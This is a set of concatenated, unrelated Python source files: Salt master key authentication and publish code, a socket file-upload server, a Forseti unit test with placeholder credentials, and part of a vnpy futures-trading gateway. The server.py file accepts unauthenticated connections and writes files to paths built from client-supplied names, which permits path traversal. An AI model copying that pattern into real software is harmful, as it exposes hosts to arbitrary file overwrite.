if not (stat.S_IWGRP & fmode.st_mode or
stat.S_IWOTH & fmode.st_mode):
return True
return False
def _check_autosign(self, keyid):
'''
Checks if the specified keyid should automatically be signed.
'''
if self.opts['auto_accept']:
return True
autosign_file = self.opts.get("autosign_file", None)
if not autosign_file or not os.path.exists(autosign_file):
return False
if not self._check_permissions(autosign_file):
message = "Wrong permissions for {0}, ignoring content"
log.warn(message.format(autosign_file))
return False
with salt.utils.fopen(autosign_file, 'r') as fp_:
for line in fp_:
line = line.strip()
if line.startswith('#'):
continue
if line == keyid:
return True
if fnmatch.fnmatch(keyid, line):
return True
try:
if re.match(line, keyid):
return True
except re.error:
message = ('{0} is not a valid regular expression, '
'ignoring line in {1}')
log.warn(message.format(line, autosign_file))
continue
return False
def _auth(self, load):
'''
Authenticate the client, use the sent public key to encrypt the aes key
which was generated at start up.
This method fires an event over the master event manager. The event is
tagged "auth" and returns a dict with information about the auth
event
'''
# 0. Check for max open files
# 1. Verify that the key we are receiving matches the stored key
# 2. Store the key if it is not there
# 3. make an rsa key with the pub key
# 4. encrypt the aes key as an encrypted salt.payload
# 5. package the return and return it
salt.utils.verify.check_max_open_files(self.opts)
log.info('Authentication request from {id}'.format(**load))
pubfn = os.path.join(self.opts['pki_dir'],
'minions',
load['id'])
pubfn_pend = os.path.join(self.opts['pki_dir'],
'minions_pre',
load['id'])
pubfn_rejected = os.path.join(self.opts['pki_dir'],
'minions_rejected',
load['id'])
if self.opts['open_mode']:
# open mode is turned on, nuts to checks and overwrite whatever
# is there
pass
elif os.path.isfile(pubfn_rejected):
# The key has been rejected, don't place it in pending
log.info('Public key rejected for {id}'.format(**load))
ret = {'enc': 'clear',
'load': {'ret': False}}
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return ret
elif os.path.isfile(pubfn):
# The key has been accepted check it
if not salt.utils.fopen(pubfn, 'r').read() == load['pub']:
log.error(
'Authentication attempt from {id} failed, the public '
'keys did not match. This may be an attempt to compromise '
'the Salt cluster.'.format(**load)
)
ret = {'enc': 'clear',
'load': {'ret': False}}
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return ret
elif not os.path.isfile(pubfn_pend)\
and not self._check_autosign(load['id']):
# This is a new key, stick it in pre
log.info(
'New public key placed in pending for {id}'.format(**load)
)
with salt.utils.fopen(pubfn_pend, 'w+') as fp_:
fp_.write(load['pub'])
ret = {'enc': 'clear',
'load': {'ret': True}}
eload = {'result': True,
'act': 'pend',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return ret
elif os.path.isfile(pubfn_pend)\
and not self._check_autosign(load['id']):
# This key is in pending, if it is the same key ret True, else
# ret False
if not salt.utils.fopen(pubfn_pend, 'r').read() == load['pub']:
log.error(
'Authentication attempt from {id} failed, the public '
'keys in pending did not match. This may be an attempt to '
'compromise the Salt cluster.'.format(**load)
)
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return {'enc': 'clear',
'load': {'ret': False}}
else:
log.info(
'Authentication failed from host {id}, the key is in '
'pending and needs to be accepted with salt-key '
'-a {id}'.format(**load)
)
eload = {'result': True,
'act': 'pend',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return {'enc': 'clear',
'load': {'ret': True}}
elif os.path.isfile(pubfn_pend)\
and self._check_autosign(load['id']):
# This key is in pending, if it is the same key auto accept it
if not salt.utils.fopen(pubfn_pend, 'r').read() == load['pub']:
log.error(
'Authentication attempt from {id} failed, the public '
'keys in pending did not match. This may be an attempt to '
'compromise the Salt cluster.'.format(**load)
)
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return {'enc': 'clear',
'load': {'ret': False}}
else:
pass
elif not os.path.isfile(pubfn_pend)\
and self._check_autosign(load['id']):
# This is a new key and it should be automatically be accepted
pass
else:
# Something happened that I have not accounted for, FAIL!
log.warn('Unaccounted for authentication failure')
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return {'enc': 'clear',
'load': {'ret': False}}
log.info('Authentication accepted from {id}'.format(**load))
with salt.utils.fopen(pubfn, 'w+') as fp_:
fp_.write(load['pub'])
pub = None
# The key payload may sometimes be corrupt when using auto-accept
# and an empty request comes in
try:
pub = RSA.load_pub_key(pubfn)
except RSA.RSAError as e:
log.error('Corrupt public key "{0}": {1}'.format(pubfn, e))
return {'enc': 'clear',
'load': {'ret': False}}
ret = {'enc': 'pub',
'pub_key': self.master_key.get_pub_str(),
'publish_port': self.opts['publish_port'],
}
if self.opts['auth_mode'] >= 2:
if 'token' in load:
try:
mtoken = self.master_key.key.private_decrypt(load['token'], 4)
aes = '{0}_|-{1}'.format(self.opts['aes'], mtoken)
except Exception:
# Token failed to decrypt, send back the salty bacon to
# support older minions
pass
else:
aes = self.opts['aes']
ret['aes'] = pub.public_encrypt(aes, 4)
else:
if 'token' in load:
try:
mtoken = self.master_key.key.private_decrypt(load['token'], 4)
ret['token'] = pub.public_encrypt(mtoken, 4)
except Exception:
# Token failed to decrypt, send back the salty bacon to
# support older minions
pass
aes = self.opts['aes']
ret['aes'] = pub.public_encrypt(self.opts['aes'], 4)
# Be aggressive about the signature
digest = hashlib.sha256(aes).hexdigest()
ret['sig'] = self.master_key.key.private_encrypt(digest, 5)
eload = {'result': True,
'act': 'accept',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return ret
def wheel(self, clear_load):
'''
Send a master control function back to the wheel system
'''
# All wheel ops pass through eauth
if not 'eauth' in clear_load:
return ''
if not clear_load['eauth'] in self.opts['external_auth']:
# The eauth system is not enabled, fail
return ''
try:
name = self.loadauth.load_name(clear_load)
if not name in self.opts['external_auth'][clear_load['eauth']]:
return ''
if not self.loadauth.time_auth(clear_load):
return ''
good = self.ckminions.wheel_check(
self.opts['external_auth'][clear_load['eauth']][name],
clear_load['fun'])
if not good:
return ''
return self.wheel_.call_func(
clear_load.pop('fun'),
**clear_load)
except Exception as exc:
log.error(
('Exception occurred in the wheel system: {0}'
).format(exc)
)
return ''
def mk_token(self, clear_load):
'''
Create and return an authentication token. The clear load needs to
contain the eauth key and the needed authentication creds.
'''
if not 'eauth' in clear_load:
return ''
if not clear_load['eauth'] in self.opts['external_auth']:
# The eauth system is not enabled, fail
return ''
try:
name = self.loadauth.load_name(clear_load)
if not name in self.opts['external_auth'][clear_load['eauth']]:
return ''
if not self.loadauth.time_auth(clear_load):
return ''
return self.loadauth.mk_token(clear_load)
except Exception as exc:
log.error(
('Exception occurred while authenticating: {0}'
).format(exc)
)
return ''
def publish(self, clear_load):
'''
This method sends out publications to the minions, it can only be used
by the LocalClient.
'''
extra = clear_load.get('kwargs', {})
# Check for external auth calls
if extra.get('token', False):
# A token was passed, check it
try:
token = self.loadauth.get_tok(extra['token'])
except Exception as exc:
log.error(
('Exception occurred when generating auth token: {0}'
).format(exc)
)
return ''
if not token:
return ''
if not token['eauth'] in self.opts['external_auth']:
return ''
if not token['name'] in self.opts['external_auth'][token['eauth']]:
return ''
good = self.ckminions.auth_check(
self.opts['external_auth'][token['eauth']][token['name']],
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
# Accept find_job so the cli will function cleanly
if not clear_load['fun'] == 'saltutil.find_job':
return ''
elif 'eauth' in extra:
if not extra['eauth'] in self.opts['external_auth']:
# The eauth system is not enabled, fail
return ''
try:
name = self.loadauth.load_name(extra)
if not name in self.opts['external_auth'][extra['eauth']]:
return ''
if not self.loadauth.time_auth(extra):
return ''
except Exception as exc:
log.error(
('Exception occurred while authenticating: {0}'
).format(exc)
)
return ''
good = self.ckminions.auth_check(
self.opts['external_auth'][extra['eauth']][name],
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
# Accept find_job so the cli will function cleanly
if not clear_load['fun'] == 'saltutil.find_job':
return ''
# Verify that the caller has root on master
elif 'user' in clear_load:
if clear_load['user'].startswith('sudo_'):
if not clear_load.pop('key') == self.key[self.opts.get('user', 'root')]:
return ''
elif clear_load['user'] == self.opts.get('user', 'root'):
if not clear_load.pop('key') == self.key[self.opts.get('user', 'root')]:
return ''
elif clear_load['user'] == 'root':
if not clear_load.pop('key') == self.key.get(self.opts.get('user', 'root')):
return ''
elif clear_load['user'] == getpass.getuser():
if not clear_load.pop('key') == self.key.get(clear_load['user']):
return ''
else:
if clear_load['user'] in self.key:
# User is authorised, check key and check perms
if not clear_load.pop('key') == self.key[clear_load['user']]:
return ''
if not clear_load['user'] in self.opts['client_acl']:
return ''
good = self.ckminions.auth_check(
self.opts['client_acl'][clear_load['user']],
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
# Accept find_job so the cli will function cleanly
if not clear_load['fun'] == 'saltutil.find_job':
return ''
else:
return ''
else:
if not clear_load.pop('key') == self.key[getpass.getuser()]:
return ''
if not clear_load['jid']:
clear_load['jid'] = salt.utils.prep_jid(
self.opts['cachedir'],
self.opts['hash_type']
)
jid_dir = salt.utils.jid_dir(
clear_load['jid'],
self.opts['cachedir'],
self.opts['hash_type']
)
# Verify the jid dir
if not os.path.isdir(jid_dir):
os.makedirs(jid_dir)
# Save the invocation information
self.serial.dump(
clear_load,
salt.utils.fopen(os.path.join(jid_dir, '.load.p'), 'w+')
)
if self.opts['ext_job_cache']:
try:
fstr = '{0}.save_load'.format(self.opts['ext_job_cache'])
self.mminion.returners[fstr](clear_load['jid'], clear_load)
except KeyError:
msg = ('The specified returner used for the external job '
'cache "{0}" does not have a save_load function!'
).format(self.opts['ext_job_cache'])
log.critical(msg)
# Set up the payload
payload = {'enc': 'aes'}
# Altering the contents of the publish load is serious!! Changes here
# break compatibility with minion/master versions and even tiny
# additions can have serious implications on the performance of the
# publish commands.
#
# In short, check with Thomas Hatch before you even think about
# touching this stuff, we can probably do what you want to do another
# way that won't have a negative impact.
load = {
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'tgt': clear_load['tgt'],
'jid': clear_load['jid'],
'ret': clear_load['ret'],
}
if 'tgt_type' in clear_load:
load['tgt_type'] = clear_load['tgt_type']
if 'to' in clear_load:
load['to'] = clear_load['to']
if 'user' in clear_load:
log.info(('User {user} Published command {fun} with jid'
' {jid}').format(**clear_load))
load['user'] = clear_load['user']
else:
log.info(('Published command {fun} with jid'
' {jid}').format(**clear_load))
log.debug('Published command details {0}'.format(load))
payload['load'] = self.crypticle.dumps(load)
# Send 0MQ to the publisher
context = zmq.Context(1)
pub_sock = context.socket(zmq.PUSH)
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
pub_sock.connect(pull_uri)
pub_sock.send(self.serial.dumps(payload))
minions = self.ckminions.check_minions(
load['tgt'],
load.get('tgt_type', 'glob')
)
try:
return {
'enc': 'clear',
'load': {
'jid': clear_load['jid'],
'minions': minions
}
}
finally:
pub_sock.setsockopt(zmq.LINGER, 2500)
pub_sock.close()
context.term()
|
server.py
|
# coding: utf-8
import os
import sys
import socket
import threading
import buffer
from time import sleep
from scheduler import scheduler
class Receiver:
def __init__(self, host='0.0.0.0', port=6666):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((host, port))
s.listen(5)
except socket.error as msg:
print(msg)
sys.exit(1)
print('Server is ready...')
print('Waiting connection...')
while True:
conn, addr = s.accept()
connbuf = buffer.Buffer(conn)
recv_thread = threading.Thread(target=self.deal_data, args=(connbuf, addr))
recv_thread.start()
def deal_data(self, connbuf, addr):
print()
print("Got a connection from ", addr)
absolute_path = '/var/www/socialmails/schedule_server/'
connbuf.put_utf8('Hi, Welcome to the server!')
eml_type = connbuf.get_utf8()
eml_name = absolute_path+'eml/'+connbuf.get_utf8()
user_group = connbuf.get_utf8()
mail_excel = absolute_path+'excel/'+connbuf.get_utf8()
annex = absolute_path+'annex/'+connbuf.get_utf8()
datetime = connbuf.get_utf8()
absolute_path = '/var/www/socialmails/schedule_server/'
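# Each incoming file is preceded by its size in bytes, then streamed in 4096-byte chunks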
for file_name in [eml_name, mail_excel, annex]:
file_size = int(connbuf.get_utf8())
print('file size: ', file_size )
with open(file_name, 'wb') as f:
remaining = file_size
while remaining:
chunk_size = 4096 if remaining >= 4096 else remaining
chunk = connbuf.get_bytes(chunk_size)
if not chunk: break
f.write(chunk)
remaining -= len(chunk)
if remaining:
print(file_name,' incomplete. Missing',remaining,'bytes.')
else:
print(file_name,' received successfully.')
# print('All data ({0}, {1}, {2})'.format(eml_type, user_group, datetime))
print()
scheduler(datetime, [eml_type, eml_name, user_group, mail_excel, annex])
if __name__ == "__main__":
receiver = Receiver()
|
base_repository_test.py
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests the base repository classes."""
import datetime
import threading
import unittest
from googleapiclient import discovery
from googleapiclient import http
import mock
import google.auth
from google.oauth2 import credentials
from google.oauth2 import service_account
from tests import unittest_utils
from google.cloud import forseti as forseti_security
from google.cloud.forseti.common.gcp_api import _base_repository as base
from google.cloud.forseti.common.gcp_api import _supported_apis
class BaseRepositoryTest(unittest_utils.ForsetiTestCase):
"""Test the Base Repository methods."""
def get_test_credential(self):
access_token = 'foo'
client_id = 'some_client_id'
client_secret = 'cOuDdkfjxxnv+'
refresh_token = '1/0/a.df219fjls0'
token_uri = 'https://example.com/oauth2/token'
token_expiry = datetime.datetime.utcnow()
user_agent = ''
creds = credentials.Credentials(
access_token, refresh_token=refresh_token,
token_uri=token_uri, client_id=client_id,
client_secret=client_secret, scopes=['foo'])
creds.expiry = token_expiry
return creds
@mock.patch('google.auth.crypt.rsa.RSASigner.from_string',
return_value=object())
def get_test_service_account(self, mock_signer):
keyfile_dict = {
'type': 'service_account',
'client_email': 'test@service.account',
'private_key': '12345',
'private_key_id': '12345',
'client_id': '123',
'token_uri': 'https://example.com/oauth2/token'}
creds = (
service_account.Credentials.from_service_account_info(
keyfile_dict))
return creds
def test_build_http(self):
"""Verify set user agent sets the user agent correctly."""
http_mock = http.HttpMock()
h = base._build_http(http=http_mock)
_ = h.request('http://test.foo', 'GET')
self.assertTrue(
forseti_security.__package_name__ in
h.headers.get('user-agent'))
def test_set_scopes(self):
creds = self.get_test_service_account()
self.assertTrue(creds.requires_scopes)
scoped_creds = base.with_scopes_if_required(
creds, list(base.CLOUD_SCOPES))
self.assertFalse(scoped_creds.requires_scopes)
@mock.patch.object(discovery, 'build', autospec=True)
def test_forseti_supported_api_is_ok(
self,
mock_discovery_build):
"""Test that Forseti-supported API in BaseClient.__init__() works.
Args:
mock_discovery_build (Mock): Mock object.
Setup:
* Pick one of the supported APIs.
* Instantiate the Base Client with just the API name.
Expect:
* The resulting API client service has the same API name and
version as the supported API.
"""
api_name = list(_supported_apis.SUPPORTED_APIS.keys())[0]
supported_api = _supported_apis.SUPPORTED_APIS[api_name]
mock_credentials = mock.MagicMock()
repo_client = base.BaseRepositoryClient(
api_name, credentials=mock_credentials)
self.assertEqual((api_name, [supported_api['default_version']]),
(repo_client.name, repo_client.versions))
@mock.patch.object(discovery, 'build', autospec=True)
@mock.patch.object(base, 'LOGGER', autospec=True)
def test_forseti_unsupported_valid_version_is_ok(
self,
mock_logger,
mock_discovery_build):
"""Test that Forseti-supported API with unsupported valid version is ok.
Args:
mock_logger (Mock): Mock objects.
mock_discovery_build (Mock): Mock object.
Setup:
* Pick one of the supported APIs.
* Pick a valid version (not officially supported by Forseti).
* Instantiate the Base Client with the API name and version.
Expect:
* Unsupported version will call LOGGER.warn().
"""
api_name = 'cloudresourcemanager'
self.assertTrue(api_name in _supported_apis.SUPPORTED_APIS)
provided_version = 'v1beta1'
self.assertFalse(
provided_version in
_supported_apis.SUPPORTED_APIS[api_name]['supported_versions'])
mock_credentials = mock.MagicMock()
repo_client = base.BaseRepositoryClient(
api_name, credentials=mock_credentials, versions=[provided_version])
self.assertEqual((api_name, [provided_version]),
(repo_client.name, repo_client.versions))
mock_logger.warn.assert_called_with(
mock.ANY, api_name, provided_version)
@mock.patch.object(discovery, 'build', autospec=True)
@mock.patch.object(base, 'LOGGER', autospec=True)
def test_forseti_unsupported_api_is_ok(
self,
mock_logger,
mock_discovery_build):
"""Test that unsupported API is ok.
Args:
mock_logger (Mock): Mock objects.
mock_discovery_build (Mock): Mock object.
Setup:
* Pick a non-supported API.
* Pick a valid version (not officially supported by Forseti).
* Instantiate the Base Client with the API name and version.
Expect:
* Unsupported API will call LOGGER.warn().
"""
api_name = 'zoo'
self.assertFalse(api_name in _supported_apis.SUPPORTED_APIS)
provided_versions = ['v1', 'v2']
mock_credentials = mock.MagicMock()
repo_client = base.BaseRepositoryClient(
api_name, credentials=mock_credentials, versions=provided_versions)
expected_repr = 'API: name=zoo, versions=[\'v1\', \'v2\']'
self.assertEqual(expected_repr, '%s' % repo_client)
mock_logger.warn.assert_called_with(
mock.ANY, api_name)
@mock.patch.object(discovery, 'build', autospec=True)
def test_init_repository_no_supported_version(self, mock_discovery_build):
"""Verify that _init_repository will pick a version if none provided."""
class ZooRepository(base.GCPRepository):
def __init__(self, **kwargs):
super(ZooRepository, self).__init__(component='a', **kwargs)
# Return a different mock object each time build is called.
mock_discovery_build.side_effect = [mock.Mock(), mock.Mock()]
mock_credentials = mock.MagicMock()
repo_client = base.BaseRepositoryClient(
'zoo', credentials=mock_credentials, versions=['v2', 'v1'])
repo = repo_client._init_repository(ZooRepository)
self.assertEqual(repo_client.gcp_services['v1'], repo.gcp_service)
self.assertNotEqual(repo_client.gcp_services['v2'], repo.gcp_service)
def test_multiple_threads_unique_http_objects(self):
"""Validate that each thread gets its unique http object.
At the core of this requirement is the fact that httplib2.Http is not
thread-safe. Therefore, it is the responsibility of the repo to maintain
a separate http object even if multiple threads share it.
"""
def get_http(repo, result, i):
result[i] = repo.http
gcp_service_mock = mock.Mock()
credentials_mock = mock.Mock(spec=credentials.Credentials)
repo = base.GCPRepository(
gcp_service=gcp_service_mock,
credentials=credentials_mock,
component='fake_component',
use_cached_http=True)
http_objects = [None] * 2
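# Fetch repo.http from two separate threads and record what each one sees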
t1 = threading.Thread(target=get_http, args=(repo, http_objects, 0))
t2 = threading.Thread(target=get_http, args=(repo, http_objects, 1))
t1.start()
t2.start()
t1.join()
t2.join()
self.assertNotEqual(http_objects[0], http_objects[1])
@mock.patch('google.auth.crypt.rsa.RSASigner.from_string',
return_value=object())
def test_no_cached_http_gets_different_http_objects(self, signer_factory):
"""Validate that each unique credential gets a unique http object.
At the core of this requirement is the fact that some API's require
distinctly scoped credentials, whereas the authenticated http object
is cached for all clients in the same thread.
"""
http_objects = [None] * 2
for i in range(2):
gcp_service_mock = mock.Mock()
fake_credentials = self.get_test_credential()
repo = base.GCPRepository(
gcp_service=gcp_service_mock,
credentials=fake_credentials,
component='fake_component{}'.format(i),
use_cached_http=False)
http_objects[i] = repo.http
self.assertNotEqual(http_objects[0], http_objects[1])
@mock.patch('google.auth.crypt.rsa.RSASigner.from_string',
return_value=object())
def test_use_cached_http_gets_same_http_objects(self, signer_factory):
"""Different clients with the same credential get the same http object.
This verifies that a new http object is not created when two
repository clients use the same credentials object.
"""
fake_credentials = self.get_test_credential()
http_objects = [None] * 2
for i in range(2):
gcp_service_mock = mock.Mock()
repo = base.GCPRepository(
gcp_service=gcp_service_mock,
credentials=fake_credentials,
component='fake_component{}'.format(i),
use_cached_http=True)
http_objects[i] = repo.http
self.assertEqual(http_objects[0], http_objects[1])
if __name__ == '__main__':
unittest.main()
|
rohon_gateway.py
|
"""
"""
import sys
import json
import traceback
from datetime import datetime, timedelta
from copy import copy,deepcopy
from functools import lru_cache
from typing import List
import pandas as pd
from .vnctpmd import MdApi
from .vnctptd import TdApi
from .ctp_constant import (
THOST_FTDC_OAS_Submitted,
THOST_FTDC_OAS_Accepted,
THOST_FTDC_OAS_Rejected,
THOST_FTDC_OST_NoTradeQueueing,
THOST_FTDC_OST_PartTradedQueueing,
THOST_FTDC_OST_AllTraded,
THOST_FTDC_OST_Canceled,
THOST_FTDC_D_Buy,
THOST_FTDC_D_Sell,
THOST_FTDC_PD_Long,
THOST_FTDC_PD_Short,
THOST_FTDC_OPT_LimitPrice,
THOST_FTDC_OPT_AnyPrice,
THOST_FTDC_OF_Open,
THOST_FTDC_OFEN_Close,
THOST_FTDC_OFEN_CloseYesterday,
THOST_FTDC_OFEN_CloseToday,
THOST_FTDC_PC_Futures,
THOST_FTDC_PC_Options,
THOST_FTDC_PC_Combination,
THOST_FTDC_CP_CallOptions,
THOST_FTDC_CP_PutOptions,
THOST_FTDC_HF_Speculation,
THOST_FTDC_CC_Immediately,
THOST_FTDC_FCC_NotForceClose,
THOST_FTDC_TC_GFD,
THOST_FTDC_VC_AV,
THOST_FTDC_TC_IOC,
THOST_FTDC_VC_CV,
THOST_FTDC_AF_Delete
)
from vnpy.trader.constant import (
Direction,
Offset,
Exchange,
OrderType,
Product,
Status,
OptionType,
Interval
)
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (
TickData,
BarData,
OrderData,
TradeData,
PositionData,
AccountData,
ContractData,
OrderRequest,
CancelRequest,
SubscribeRequest,
HistoryRequest
)
from vnpy.trader.utility import (
extract_vt_symbol,
get_folder_path,
get_trading_date,
get_underlying_symbol,
round_to,
BarGenerator,
print_dict
)
from vnpy.trader.event import EVENT_TIMER
# 增加通达信指数接口行情
from time import sleep
from threading import Thread
from pytdx.exhq import TdxExHq_API
from vnpy.amqp.consumer import subscriber
from vnpy.data.tdx.tdx_common import (
TDX_FUTURE_HOSTS,
get_future_contracts,
save_future_contracts,
get_cache_json,
save_cache_json,
TDX_FUTURE_CONFIG)
from vnpy.component.base import (
MARKET_DAY_ONLY, NIGHT_MARKET_23, NIGHT_MARKET_SQ2
)
STATUS_ROHON2VT = {
THOST_FTDC_OAS_Submitted: Status.SUBMITTING,
THOST_FTDC_OAS_Accepted: Status.SUBMITTING,
THOST_FTDC_OAS_Rejected: Status.REJECTED,
THOST_FTDC_OST_NoTradeQueueing: Status.NOTTRADED,
THOST_FTDC_OST_PartTradedQueueing: Status.PARTTRADED,
THOST_FTDC_OST_AllTraded: Status.ALLTRADED,
THOST_FTDC_OST_Canceled: Status.CANCELLED
}
DIRECTION_VT2ROHON = {
Direction.LONG: THOST_FTDC_D_Buy,
Direction.SHORT: THOST_FTDC_D_Sell
}
DIRECTION_ROHON2VT = {v: k for k, v in DIRECTION_VT2ROHON.items()}
DIRECTION_ROHON2VT[THOST_FTDC_PD_Long] = Direction.LONG
DIRECTION_ROHON2VT[THOST_FTDC_PD_Short] = Direction.SHORT
ORDERTYPE_VT2ROHON = {
OrderType.LIMIT: THOST_FTDC_OPT_LimitPrice,
OrderType.MARKET: THOST_FTDC_OPT_AnyPrice
}
ORDERTYPE_ROHON2VT = {v: k for k, v in ORDERTYPE_VT2ROHON.items()}
OFFSET_VT2ROHON = {
Offset.OPEN: THOST_FTDC_OF_Open,
Offset.CLOSE: THOST_FTDC_OFEN_Close,
Offset.CLOSETODAY: THOST_FTDC_OFEN_CloseToday,
Offset.CLOSEYESTERDAY: THOST_FTDC_OFEN_CloseYesterday,
}
OFFSET_ROHON2VT = {v: k for k, v in OFFSET_VT2ROHON.items()}
EXCHANGE_ROHON2VT = {
"CFFEX": Exchange.CFFEX,
"SHFE": Exchange.SHFE,
"CZCE": Exchange.CZCE,
"DCE": Exchange.DCE,
"INE": Exchange.INE,
"SPD": Exchange.SPD
}
PRODUCT_ROHON2VT = {
THOST_FTDC_PC_Futures: Product.FUTURES,
THOST_FTDC_PC_Options: Product.OPTION,
THOST_FTDC_PC_Combination: Product.SPREAD
}
OPTIONTYPE_ROHON2VT = {
THOST_FTDC_CP_CallOptions: OptionType.CALL,
THOST_FTDC_CP_PutOptions: OptionType.PUT
}
MAX_FLOAT = sys.float_info.max
symbol_exchange_map = {}
symbol_name_map = {}
symbol_size_map = {}
index_contracts = {}
# tdx 期货配置本地缓存
future_contracts = get_future_contracts()
# 时间戳对齐
TIME_GAP = 8 * 60 * 60 * 1000000000
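# Editor's note: TIME_GAP is 8 hours expressed in nanoseconds. tqsdk kline frames
# carry epoch timestamps in UTC nanoseconds, so adding TIME_GAP before
# pd.to_datetime() (see TqMdApi.query_history below) appears to shift them to
# Beijing time (UTC+8).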
INTERVAL_VT2TQ = {
Interval.MINUTE: 60,
Interval.HOUR: 60 * 60,
Interval.DAILY: 60 * 60 * 24,
}
TQ2VT_TYPE = {
"FUTURE_OPTION": Product.OPTION,
"INDEX": Product.INDEX,
"FUTURE_COMBINE": Product.SPREAD,
"SPOT": Product.SPOT,
"FUTURE_CONT": Product.INDEX,
"FUTURE": Product.FUTURES,
"FUTURE_INDEX": Product.INDEX,
"OPTION": Product.OPTION,
}
@lru_cache(maxsize=9999)
def vt_to_tq_symbol(symbol: str, exchange: Exchange) -> str:
"""
TQSdk exchange first
"""
for count, word in enumerate(symbol):
if word.isdigit():
break
fix_symbol = symbol
if exchange in [Exchange.INE, Exchange.SHFE, Exchange.DCE]:
fix_symbol = symbol.lower()
# Check for index symbol
time_str = symbol[count:]
if time_str in ["88"]:
return f"KQ.m@{exchange.value}.{fix_symbol[:count]}"
if time_str in ["99"]:
return f"KQ.i@{exchange.value}.{fix_symbol[:count]}"
return f"{exchange.value}.{fix_symbol}"
@lru_cache(maxsize=9999)
def tq_to_vt_symbol(tq_symbol: str) -> str:
""""""
if "KQ.m" in tq_symbol:
ins_type, instrument = tq_symbol.split("@")
exchange, symbol = instrument.split(".")
return f"{symbol}88.{exchange}"
elif "KQ.i" in tq_symbol:
ins_type, instrument = tq_symbol.split("@")
exchange, symbol = instrument.split(".")
return f"{symbol}99.{exchange}"
else:
exchange, symbol = tq_symbol.split(".")
return f"{symbol}.{exchange}"
class RohonGateway(BaseGateway):
"""
    VN Trader Gateway for ROHON.
"""
default_setting = {
"用户名": "",
"密码": "",
"经纪商代码": "",
"交易服务器": "",
"行情服务器": "",
"产品名称": "",
"授权编码": "",
"产品信息": ""
}
# 注
# 如果采用rabbit_mq拓展tdx指数行情,default_setting中,需要增加:
# "rabbit":
# {
# "host": "192.168.1.211",
# "exchange": "x_fanout_idx_tick"
# }
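    # Hedged example of a full connect() setting dict (all values below are
    # placeholders, not real accounts or endpoints); only one of "rabbit"/"tq"
    # is used at a time, see connect():
    #
    # setting = {
    #     "用户名": "000001",
    #     "密码": "******",
    #     "经纪商代码": "9999",
    #     "交易服务器": "tcp://127.0.0.1:10130",
    #     "行情服务器": "tcp://127.0.0.1:10131",
    #     "产品名称": "client_demo_1.0",
    #     "授权编码": "0000000000000000",
    #     "产品信息": "",
    #     "rabbit": {"host": "192.168.1.211", "exchange": "x_fanout_idx_tick"},
    #     "debug": False,
    # }
    # gateway.connect(setting)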
exchanges = list(EXCHANGE_ROHON2VT.values())
def __init__(self, event_engine, gateway_name="ROHON"):
"""Constructor"""
super().__init__(event_engine, gateway_name)
self.td_api = None
self.md_api = None
self.tdx_api = None
self.rabbit_api = None
self.tq_api = None
# 是否输出debug信息
self.debug = False
self.subscribed_symbols = set() # 已订阅合约代码
self.combiner_conf_dict = {} # 保存合成器配置
# 自定义价差/加比的tick合成器
self.combiners = {}
self.tick_combiner_map = {}
def connect(self, setting: dict):
""""""
userid = setting["用户名"]
password = setting["密码"]
brokerid = setting["经纪商代码"]
td_address = setting["交易服务器"]
md_address = setting["行情服务器"]
appid = setting["产品名称"]
auth_code = setting["授权编码"]
product_info = setting["产品信息"]
rabbit_dict = setting.get('rabbit', None)
tq_dict = setting.get('tq', None)
self.debug = setting.get('debug',False)
if not td_address.startswith("tcp://"):
td_address = "tcp://" + td_address
if not md_address.startswith("tcp://"):
md_address = "tcp://" + md_address
# 获取自定义价差/价比合约的配置
try:
from vnpy.trader.engine import CustomContract
c = CustomContract()
self.combiner_conf_dict = c.get_config()
if len(self.combiner_conf_dict) > 0:
self.write_log(u'加载的自定义价差/价比配置:{}'.format(self.combiner_conf_dict))
contract_dict = c.get_contracts()
for vt_symbol, contract in contract_dict.items():
contract.gateway_name = self.gateway_name
symbol_exchange_map[contract.symbol] = contract.exchange
self.on_contract(contract)
except Exception as ex: # noqa
pass
if not self.td_api:
self.td_api = RohonTdApi(self)
self.td_api.connect(td_address, userid, password, brokerid, auth_code, appid, product_info)
if not self.md_api:
self.md_api = RohonMdApi(self)
self.md_api.connect(md_address, userid, password, brokerid)
if rabbit_dict:
self.write_log(f'激活RabbitMQ行情接口')
self.rabbit_api = SubMdApi(gateway=self)
self.rabbit_api.connect(rabbit_dict)
elif tq_dict is not None:
self.write_log(f'激活天勤行情接口')
self.tq_api = TqMdApi(gateway=self)
self.tq_api.connect(tq_dict)
else:
self.write_log(f'激活通达信行情接口')
self.tdx_api = TdxMdApi(gateway=self)
self.tdx_api.connect()
self.init_query()
for (vt_symbol, is_bar) in list(self.subscribed_symbols):
symbol, exchange = extract_vt_symbol(vt_symbol)
req = SubscribeRequest(
symbol=symbol,
exchange=exchange,
is_bar=is_bar
)
# 指数合约,从tdx行情、天勤订阅
if req.symbol[-2:] in ['99']:
req.symbol = req.symbol.upper()
if self.tdx_api is not None:
self.write_log(u'有指数订阅,连接通达信行情服务器')
